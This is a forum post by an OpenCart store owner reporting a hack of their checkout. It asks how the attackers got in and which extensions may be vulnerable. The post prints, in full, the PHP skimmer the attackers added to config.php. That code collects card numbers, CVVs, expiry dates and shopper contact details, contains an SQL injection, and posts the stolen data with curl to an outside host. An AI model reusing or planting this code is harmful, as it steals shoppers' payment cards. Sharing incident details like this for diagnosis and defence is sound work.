The hacker has added a fake payment section into the checkout Step 5, to defraud users of their card payment details.
Please see attached screenshot of the spoof payment fields they inserted.
The following files were modified to first allow file uploads:
\admin\language\en-gb\extension\keysubmit.php
\admin\language\en-gb\extension\headermenu.php
\admin\language\en-gb\extension\extension\feed.php
\admin\language\ru-ru\extension\module\sitemenu.php
Then the spoof html fields were added to both Default template, and also our custom template too:
\catalog\view\theme\default\template\checkout\payment_method.twig
\catalog\view\theme\[our_custom_theme]\template\checkout\payment_method.twig
Then the following code was added to:
\config.php
Code: Select all
if (isset($_POST['postcode'])){
session_start();
$_SESSION['adddreas'] = $_POST["address_1"];
$_SESSION['addrebs'] = $_POST["city"];
$_SESSION['sadsdws'] = $_POST["postcode"];
$_SESSION['adsdSws'] = $_POST["firstname"];
$_SESSION['adsdEWQWEws'] = $_POST["lastname"];
$_SESSION['adsdEWQWEwse'] = $_POST["email"];
$_SESSION['adsdEWQWEwst'] = $_POST["telephone"];
}
elseif (isset($_POST['address_id'])){
session_start();
$link = mysqli_connect(DB_HOSTNAME,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
$youth = $_POST['address_id'];
$sql = "SELECT * FROM oc_address WHERE address_id='$youth'";
if($res = mysqli_query($link, $sql)){
if(mysqli_num_rows($res) > 0){
while($row = mysqli_fetch_array($res)){
$_SESSION['adddreas'] = $row["address_1"];
$_SESSION['addrebs'] = $row["city"];
$_SESSION['sadsdws'] = $row["postcode"];
$_SESSION['adsdSws'] = $row["firstname"];
$_SESSION['adsdEWQWEws'] = $row["lastname"];
}
}}}
if (isset($_POST['ccc']))
{
session_start();
$ccnum = $_POST['ccc'];
$expmonth = $_POST['expp'];
$cvv = $_POST['cvvv'];
$street =$_SESSION['adddreas'];
$postcode = $_SESSION['sadsdws'];
$city = $_SESSION['addrebs'];
$fnamezz = $_SESSION['adsdEWQWEws'];
$fnamez = $_SESSION['adsdSws'];
$email = $_SESSION['adsdEWQWEwse'];
$phone = $_SESSION['adsdEWQWEwst'];
$ip = $_SERVER['SERVER_NAME'];
$message = "$fnamez $fnamezz|$ccnum|$expmonth|$cvv|$street|$city|$postcode|$phone|$email";
$rnessage = "$message\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"https://shiksd.xyz/plugins/");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"data=$rnessage&name=$ip");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$server_output = curl_exec($ch);
curl_close ($ch);
}
We have now fixed the site by restoring the hacked files from our original backup, and also done full compare of all site files to check no other files were affected. All passwords now changed, and database credentials updated.
Questions:
1. Has anyone else seen a sophisticated hack like this?
2. Is there any way to find out how they managed to inject the original code?
3. Are there any security plugins that prevent code from being edited?
4. Are there any known vulnerabilities with the mods / extensions we are using?
Opencart: 3.0.3.8
Extensions / Modules:
PayPal Checkout Integration (Highly Recommended)
Worldpay Business Gateway
CouponAtCheckout (by cartbinder)
Extra Product Pages
Mega Filter PRO
Low Stock Management
Manufacturer List
Price Based Shipping
Redirect Manager
Restrict Payment Methods
Smart Search
TMD Import Export Module
Automatically generate SEO URL slug